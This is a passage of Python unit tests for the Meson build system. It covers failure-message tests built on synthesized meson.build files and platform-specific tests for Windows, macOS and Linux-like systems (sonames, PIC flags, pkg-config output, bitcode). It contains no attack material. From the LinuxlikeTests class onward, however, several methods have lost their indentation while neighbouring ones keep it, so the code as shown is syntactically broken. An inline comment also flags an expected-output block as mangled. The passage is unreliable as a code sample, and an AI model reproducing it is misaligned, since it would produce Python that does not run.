    """`meson configure <builddir>` on a fresh build must succeed."""
    srcdir = os.path.join(self.common_test_dir, '2 cpp')
    self.init(srcdir)
    self._run(self.mconf_command + [self.builddir])
def test_summary(self):
    """summary() output for the project and its subproject must be printed
    verbatim (dict iteration order permitting on old Pythons)."""
    testdir = os.path.join(self.unit_test_dir, '72 summary')
    out = self.init(testdir)
    # NOTE(review): the leading whitespace inside this dedent block must
    # match meson's summary formatting exactly — it was mangled in
    # extraction; confirm against the real output before relying on it.
    expected = textwrap.dedent(r'''
        Some Subproject 2.0

            string: bar
            integer: 1
            boolean: True

        My Project 1.0

          Configuration
            Some boolean: False
            Another boolean: True
            Some string: Hello World
            A list: string
                    1
                    True
            A number: 1
            yes: YES
            no: NO

          Subprojects
            sub: YES
            sub2: NO
        ''')
    expected_lines = expected.split('\n')[1:]
    out_start = out.find(expected_lines[0])
    out_lines = out[out_start:].split('\n')[:len(expected_lines)]
    if sys.version_info < (3, 7, 0):
        # Dictionary order is not stable in Python <3.7, so sort the lines
        # while comparing
        self.assertEqual(sorted(expected_lines), sorted(out_lines))
    else:
        self.assertEqual(expected_lines, out_lines)
class FailureTests(BasePlatformTests):
    '''
    Tests that test failure conditions. Build files here should be dynamically
    generated and static tests should go into `test cases/failing*`.
    This is useful because there can be many ways in which a particular
    function can fail, and creating failing tests for all of them is tedious
    and slows down testing.
    '''
    # Regex matching meson's generic "dependency not found" error message.
    dnf = "[Dd]ependency.*not found(:.*)?"
    # Regex matching meson's "pkg-config not found" error message.
    nopkg = '[Pp]kg-config.*not found'
    def setUp(self):
        # Each test synthesizes its own meson.build / meson_options.txt into a
        # throwaway source directory.
        super().setUp()
        self.srcdir = os.path.realpath(tempfile.mkdtemp())
        self.mbuild = os.path.join(self.srcdir, 'meson.build')
        self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
    def tearDown(self):
        super().tearDown()
        windows_proof_rmtree(self.srcdir)
    def assertMesonRaises(self, contents, match, *,
                          extra_args=None,
                          langs=None,
                          meson_version=None,
                          options=None,
                          override_envvars=None):
        '''
        Assert that running meson configure on the specified @contents raises
        a error message matching regex @match.
        '''
        if langs is None:
            langs = []
        # Write a minimal project() plus the caller's snippet.
        with open(self.mbuild, 'w') as f:
            f.write("project('failure test', 'c', 'cpp'")
            if meson_version:
                f.write(", meson_version: '{}'".format(meson_version))
            f.write(")\n")
            for lang in langs:
                f.write("add_languages('{}', required : false)\n".format(lang))
            f.write(contents)
        if options is not None:
            with open(self.moptions, 'w') as f:
                f.write(options)
        o = {'MESON_FORCE_BACKTRACE': '1'}
        if override_envvars is None:
            override_envvars = o
        else:
            # NOTE: mutates the caller-supplied dict in place.
            override_envvars.update(o)
        # Force tracebacks so we can detect them properly
        with self.assertRaisesRegex(MesonException, match, msg=contents):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(self.srcdir, extra_args=extra_args,
                      inprocess=True,
                      override_envvars = override_envvars)
    def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
        # Configure a synthesized project and return the configure output.
        # NOTE(review): the 'match' parameter is unused here; matching is done
        # by the assertMesonOutputs/assertMesonDoesNotOutput callers.
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('output test', 'c', 'cpp'")
            if meson_version:
                f.write(", meson_version: '{}'".format(meson_version))
            f.write(")\n")
            for lang in langs:
                f.write("add_languages('{}', required : false)\n".format(lang))
            f.write(contents)
        # Run in-process for speed and consistency with assertMesonRaises
        return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
    def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents outputs
        something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertRegex(out, match)
    def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents does not output
        something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertNotRegex(out, match)
    @skipIfNoPkgconfig
    def test_dependency(self):
        # Invalid keyword-argument values to dependency() must raise with a
        # descriptive message.
        if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
            raise unittest.SkipTest('zlib not found with pkg-config')
        a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
             ("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
             ("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
             ("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
             ("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
             ("dependency('zlibfail')", self.dnf),)
        for contents, match in a:
            self.assertMesonRaises(contents, match)
    def test_apple_frameworks_dependency(self):
        if not is_osx():
            raise unittest.SkipTest('only run on macOS')
        self.assertMesonRaises("dependency('appleframeworks')",
                               "requires at least one module")
    def test_extraframework_dependency_method(self):
        code = "dependency('python', method : 'extraframework')"
        if not is_osx():
            self.assertMesonRaises(code, self.dnf)
        else:
            # Python2 framework is always available on macOS
            self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
    def test_sdl2_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('sdl2-config'):
            raise unittest.SkipTest('sdl2-config found')
        self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
        if shutil.which('pkg-config'):
            self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
        with no_pkgconfig():
            # Look for pkg-config, cache it, then
            # Use cached pkg-config without erroring out, then
            # Use cached pkg-config to error out
            code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
                   "dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
                   "dependency('sdl2', method : 'pkg-config')"
            self.assertMesonRaises(code, self.nopkg)
    def test_gnustep_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('gnustep-config'):
            raise unittest.SkipTest('gnustep-config found')
        self.assertMesonRaises("dependency('gnustep')",
                               "(requires a Objc compiler|{})".format(self.dnf),
                               langs = ['objc'])
    def test_wx_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
            raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
        self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
        self.assertMesonOutputs("dependency('wxwidgets', required : false)",
                                "Run-time dependency .*WxWidgets.* found: .*NO.*")
    def test_wx_dependency(self):
        if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
            raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
        self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
                               "module argument is not a string")
    def test_llvm_dependency(self):
        self.assertMesonRaises("dependency('llvm', modules : 'fail')",
                               "(required.*fail|{})".format(self.dnf))
    def test_boost_notfound_dependency(self):
        # Can be run even if Boost is found or not
        self.assertMesonRaises("dependency('boost', modules : 1)",
                               "module.*not a string")
        self.assertMesonRaises("dependency('boost', modules : 'fail')",
                               "(fail.*not found|{})".format(self.dnf))
    def test_boost_BOOST_ROOT_dependency(self):
        # Test BOOST_ROOT; can be run even if Boost is found or not
        self.assertMesonRaises("dependency('boost')",
                               "(BOOST_ROOT.*absolute|{})".format(self.dnf),
                               override_envvars = {'BOOST_ROOT': 'relative/path'})
    def test_dependency_invalid_method(self):
        # Calling method-specific getters on dependencies of the wrong kind
        # must raise, not crash.
        code = '''zlib_dep = dependency('zlib', required : false)
        zlib_dep.get_configtool_variable('foo')
        '''
        self.assertMesonRaises(code, ".* is not a config-tool dependency")
        code = '''zlib_dep = dependency('zlib', required : false)
        dep = declare_dependency(dependencies : zlib_dep)
        dep.get_pkgconfig_variable('foo')
        '''
        self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
        code = '''zlib_dep = dependency('zlib', required : false)
        dep = declare_dependency(dependencies : zlib_dep)
        dep.get_configtool_variable('foo')
        '''
        self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
    def test_objc_cpp_detection(self):
        '''
        Test that when we can't detect objc or objcpp, we fail gracefully.
        '''
        env = get_fake_env()
        try:
            env.detect_objc_compiler(MachineChoice.HOST)
            env.detect_objcpp_compiler(MachineChoice.HOST)
        except EnvironmentException:
            code = "add_languages('objc')\nadd_languages('objcpp')"
            self.assertMesonRaises(code, "Unknown compiler")
            return
        raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
    def test_subproject_variables(self):
        '''
        Test that:
        1. The correct message is outputted when a not-required dep is not
           found and the fallback subproject is also not found.
        2. A not-required fallback dependency is not found because the
           subproject failed to parse.
        3. A not-found not-required dep with a fallback subproject outputs the
           correct message when the fallback subproject is found but the
           variable inside it is not.
        4. A fallback dependency is found from the subproject parsed in (3)
        5. The correct message is outputted when the .wrap file is missing for
           a sub-subproject.
        '''
        tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
        out = self.init(tdir, inprocess=True)
        self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
        self.assertRegex(out, r'Function does not take positional arguments.')
        self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
        self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
        self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
    def test_exception_exit_status(self):
        '''
        Test exit status on python exception
        '''
        tdir = os.path.join(self.unit_test_dir, '21 exit status')
        # Must run out-of-process so the interpreter's exit code is observable.
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
        self.assertEqual(cm.exception.returncode, 2)
        self.wipe()
    def test_dict_requires_key_value_pairs(self):
        self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
                               'Only key:value pairs are valid in dict construction.')
        self.assertMesonRaises("{'foo': 'bar', 3}",
                               'Only key:value pairs are valid in dict construction.')
    def test_dict_forbids_duplicate_keys(self):
        self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
                               'Duplicate dictionary key: a.*')
    def test_dict_forbids_integer_key(self):
        self.assertMesonRaises("dict = {3: 'foo'}",
                               'Key must be a string.*')
    def test_using_too_recent_feature(self):
        # Here we use a dict, which was introduced in 0.47.0
        self.assertMesonOutputs("dict = {}",
                                ".*WARNING.*Project targeting.*but.*",
                                meson_version='>= 0.46.0')
    def test_using_recent_feature(self):
        # Same as above, except the meson version is now appropriate
        self.assertMesonDoesNotOutput("dict = {}",
                                      ".*WARNING.*Project targeting.*but.*",
                                      meson_version='>= 0.47')
    def test_using_too_recent_feature_dependency(self):
        self.assertMesonOutputs("dependency('pcap', required: false)",
                                ".*WARNING.*Project targeting.*but.*",
                                meson_version='>= 0.41.0')
    def test_vcs_tag_featurenew_build_always_stale(self):
        'https://github.com/mesonbuild/meson/issues/3904'
        vcs_tag = '''version_data = configuration_data()
        version_data.set('PROJVER', '@VCS_TAG@')
        vf = configure_file(output : 'version.h.in', configuration: version_data)
        f = vcs_tag(input : vf, output : 'version.h')
        '''
        msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
        self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
    def test_missing_subproject_not_required_and_required(self):
        self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
                               "sub2 = subproject('not-found-subproject', required: true)",
                               """.*Subproject "subprojects/not-found-subproject" required but not found.*""")
    def test_get_variable_on_not_found_project(self):
        self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
                               "sub1.get_variable('naaa')",
                               """Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
    def test_version_checked_before_parsing_options(self):
        '''
        https://github.com/mesonbuild/meson/issues/5281
        '''
        # The invalid option type must NOT be reported; the version mismatch
        # must win because it is checked first.
        options = "option('some-option', type: 'foo', value: '')"
        match = 'Meson version is.*but project requires >=2000'
        self.assertMesonRaises("", match, meson_version='>=2000', options=options)
    def test_assert_default_message(self):
        # assert() with no message must print the failing expression verbatim.
        self.assertMesonRaises("k1 = 'a'\n" +
                               "assert({\n" +
                               "  k1: 1,\n" +
                               "}['a'] == 2)\n",
                               r"Assert failed: {k1 : 1}\['a'\] == 2")
    def test_wrap_nofallback(self):
        self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
                               r"Dependency \'notfound\' not found and fallback is disabled",
                               extra_args=['--wrap-mode=nofallback'])
    def test_message(self):
        self.assertMesonOutputs("message('Array:', ['a', 'b'])",
                                r"Message:.* Array: \['a', 'b'\]")
    def test_warning(self):
        self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
                                r"WARNING:.* Array: \['a', 'b'\]")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
    '''
    Tests that should run on Cygwin, MinGW, and MSVC
    '''
    def setUp(self):
        super().setUp()
        # All Windows-specific project tests live under this directory.
        self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
    @unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
    def test_find_program(self):
        '''
        Test that Windows-specific edge-cases in find_program are functioning
        correctly. Cannot be an ordinary test because it involves manipulating
        PATH to point to a directory with Python scripts.
        '''
        testdir = os.path.join(self.platform_test_dir, '8 find program')
        # Find `cmd` and `cmd.exe`
        prog1 = ExternalProgram('cmd')
        self.assertTrue(prog1.found(), msg='cmd not found')
        prog2 = ExternalProgram('cmd.exe')
        self.assertTrue(prog2.found(), msg='cmd.exe not found')
        self.assertPathEqual(prog1.get_path(), prog2.get_path())
        # Find cmd with an absolute path that's missing the extension
        cmd_path = prog2.get_path()[:-4]
        prog = ExternalProgram(cmd_path)
        self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
        # Finding a script with no extension inside a directory works
        prog = ExternalProgram(os.path.join(testdir, 'test-script'))
        self.assertTrue(prog.found(), msg='test-script not found')
        # Finding a script with an extension inside a directory works
        prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
        self.assertTrue(prog.found(), msg='test-script-ext.py not found')
        # Finding a script in PATH
        # NOTE(review): this appends to os.environ['PATH'] without restoring
        # it afterwards, so the change leaks into subsequent tests — consider
        # wrapping in mock.patch.dict; confirm no later test depends on it.
        os.environ['PATH'] += os.pathsep + testdir
        # Finding a script in PATH w/o extension works and adds the interpreter
        # (check only if `.PY` is in PATHEXT)
        if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
            prog = ExternalProgram('test-script-ext')
            self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
            self.assertPathEqual(prog.get_command()[0], python_command[0])
            self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
        # Finding a script in PATH with extension works and adds the interpreter
        prog = ExternalProgram('test-script-ext.py')
        self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
        self.assertPathEqual(prog.get_command()[0], python_command[0])
        self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
        # Ensure that WindowsApps gets removed from PATH
        path = os.environ['PATH']
        if 'WindowsApps' not in path:
            # Synthesize a PATH entry so the sanitizer has something to strip.
            username = os.environ['USERNAME']
            appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
            path = os.pathsep + appstore_dir
        path = ExternalProgram._windows_sanitize_path(path)
        self.assertNotIn('WindowsApps', path)
    def test_ignore_libs(self):
        '''
        Test that find_library on libs that are to be ignored returns an empty
        array of arguments. Must be a unit test because we cannot inspect
        ExternalLibraryHolder from build files.
        '''
        testdir = os.path.join(self.platform_test_dir, '1 basic')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Not using MSVC')
        # To force people to update this test, and also test
        self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
        for l in cc.ignore_libs:
            self.assertEqual(cc.find_library(l, env, []), [])
    def test_rc_depends_files(self):
        '''
        Check that changes to files referenced by a compiled resource trigger
        a rebuild of the resource and its consumers.
        '''
        testdir = os.path.join(self.platform_test_dir, '5 resources')
        # resource compiler depfile generation is not yet implemented for msvc
        env = get_fake_env(testdir, self.builddir, self.prefix)
        depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Test compile_resources(depend_file:)
        # Changing mtime of sample.ico should rebuild prog
        self.utime(os.path.join(testdir, 'res', 'sample.ico'))
        self.assertRebuiltTarget('prog')
        # Test depfile generation by compile_resources
        # Changing mtime of resource.h should rebuild myres.rc and then prog
        if depfile_works:
            self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
            self.assertRebuiltTarget('prog')
        self.wipe()
        if depfile_works:
            # Same check for resources generated via custom targets.
            testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
            self.init(testdir)
            self.build()
            # Immediately rebuilding should not do anything
            self.assertBuildIsNoop()
            # Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
            self.utime(os.path.join(testdir, 'res', 'resource.h'))
            self.assertRebuiltTarget('prog_1')
    def test_msvc_cpp17(self):
        # C++17 builds on MSVC-like compilers; a configure failure is
        # tolerated because older compiler versions may lack C++17 support.
        testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Test only applies to MSVC-like compilers')
        try:
            self.init(testdir)
        except subprocess.CalledProcessError:
            # According to Python docs, output is only stored when
            # using check_output. We don't use it, so we can't check
            # that the output is correct (i.e. that it failed due
            # to the right reason).
            return
        self.build()
    def test_install_pdb_introspection(self):
        # MSVC-style builds must list the .pdb debug file among installed files.
        testdir = os.path.join(self.platform_test_dir, '1 basic')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Test only applies to MSVC-like compilers')
        self.init(testdir)
        installed = self.introspect('--installed')
        files = [os.path.basename(path) for path in installed.values()]
        self.assertTrue('prog.pdb' in files)
    def _check_ld(self, name: str, lang: str, expected: str) -> None:
        # Helper: set the per-language linker env var to @name and assert the
        # detected compiler's linker id equals @expected.
        if not shutil.which(name):
            raise unittest.SkipTest('Could not find {}.'.format(name))
        envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
        # patch.dict restores the environment afterwards.
        with mock.patch.dict(os.environ, {envvar: name}):
            env = get_fake_env()
            try:
                comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
            except EnvironmentException:
                raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
            self.assertEqual(comp.linker.id, expected)
    def test_link_environment_variable_lld_link(self):
        self._check_ld('lld-link', 'c', 'lld-link')
    def test_link_environment_variable_link(self):
        self._check_ld('link', 'c', 'link')
    def test_link_environment_variable_optlink(self):
        self._check_ld('optlink', 'c', 'optlink')
    def test_link_environment_variable_rust(self):
        self._check_ld('link', 'rust', 'link')
    def test_pefile_checksum(self):
        # Requires the third-party 'pefile' module; mandatory on CI only.
        try:
            import pefile
        except ImportError:
            if is_ci():
                raise
            raise unittest.SkipTest('pefile module not found')
        testdir = os.path.join(self.common_test_dir, '6 linkshared')
        self.init(testdir)
        self.build()
        # Test that binaries have a non-zero checksum
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        cc_id = cc.get_id()
        ld_id = cc.get_linker_id()
        dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
        exe = os.path.join(self.builddir, 'cppprog.exe')
        for f in (dll, exe):
            pe = pefile.PE(f)
            msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
            if cc_id == 'clang-cl':
                # Latest clang-cl tested (7.0) does not write checksums out
                self.assertFalse(pe.verify_checksum(), msg=msg)
            else:
                # Verify that a valid checksum was written by all other compilers
                self.assertTrue(pe.verify_checksum(), msg=msg)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
    '''
    Tests that should run on macOS
    '''
    def setUp(self):
        super().setUp()
        # macOS-specific project tests live under this directory.
        self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
    def test_apple_bitcode(self):
        '''
        Test that -fembed-bitcode is correctly added while compiling and
        -bitcode_bundle is added while linking when b_bitcode is true and not
        when it is false. This can't be an ordinary test case because we need
        to inspect the compiler database.
        '''
        testdir = os.path.join(self.platform_test_dir, '7 bitcode')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.id != 'clang':
            raise unittest.SkipTest('Not using Clang on OSX')
        # Try with bitcode enabled
        out = self.init(testdir, extra_args='-Db_bitcode=true')
        # Warning was printed
        self.assertRegex(out, 'WARNING:.*b_bitcode')
        # Compiler options were added
        for compdb in self.get_compdb():
            if 'module' in compdb['file']:
                # Shared modules are built without bitcode.
                self.assertNotIn('-fembed-bitcode', compdb['command'])
            else:
                self.assertIn('-fembed-bitcode', compdb['command'])
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        # Linker options were added
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
        self.assertIsNotNone(m, msg=contents)
        # Try with bitcode disabled
        self.setconf('-Db_bitcode=false')
        # Regenerate build
        self.build()
        for compdb in self.get_compdb():
            self.assertNotIn('-fembed-bitcode', compdb['command'])
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
        self.assertIsNone(m, msg=contents)
    def test_apple_bitcode_modules(self):
        '''
        Same as above, just for shared_module()
        '''
        testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
        # Ensure that it builds even with bitcode enabled
        self.init(testdir, extra_args='-Db_bitcode=true')
        self.build()
        self.run_tests()
    def _get_darwin_versions(self, fname):
        # Return (compatibility_version, current_version) reported by
        # `otool -L` for the library @fname (relative to the build dir).
        fname = os.path.join(self.builddir, fname)
        out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
        # The second output line carries the version info for the dylib itself.
        m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
        self.assertIsNotNone(m, msg=out)
        return m.groups()
    @skipIfNoPkgconfig
    def test_library_versioning(self):
        '''
        Ensure that compatibility_version and current_version are set correctly
        '''
        testdir = os.path.join(self.platform_test_dir, '2 library versions')
        self.init(testdir)
        self.build()
        targets = {}
        for t in self.introspect('--targets'):
            targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
        self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
        self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
    def test_duplicate_rpath(self):
        testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
        # We purposely pass a duplicate rpath to Meson, in order
        # to ascertain that Meson does not call install_name_tool
        # with duplicate -delete_rpath arguments, which would
        # lead to erroring out on installation
        env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
        self.init(testdir, override_envvars=env)
        self.build()
        self.install()
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
    def test_pic(self):
        '''
        Test that -fPIC is correctly added to static libraries when b_staticpic
        is true and not when it is false. This can't be an ordinary test case
        because we need to inspect the compiler database.
        '''
        if is_windows() or is_cygwin() or is_osx():
            raise unittest.SkipTest('PIC not relevant')
        testdir = os.path.join(self.common_test_dir, '3 static')
        self.init(testdir)
        # b_staticpic defaults to true, so -fPIC must be present initially.
        compdb = self.get_compdb()
        self.assertIn('-fPIC', compdb[0]['command'])
        self.setconf('-Db_staticpic=false')
        # Regenerate build
        self.build()
        compdb = self.get_compdb()
        self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
    def test_vala_c_warnings(self):
        '''
        Test that no warnings are emitted for C code generated by Vala. This
        can't be an ordinary test case because we need to inspect the compiler
        database.
        https://github.com/mesonbuild/meson/issues/864
        '''
        if not shutil.which('valac'):
            raise unittest.SkipTest('valac not installed.')
        testdir = os.path.join(self.vala_test_dir, '5 target glib')
        self.init(testdir)
        compdb = self.get_compdb()
        vala_command = None
        c_command = None
        # Pick out the compile command for the Vala-generated C file and the
        # hand-written C file; any other file is unexpected.
        for each in compdb:
            if each['file'].endswith('GLib.Thread.c'):
                vala_command = each['command']
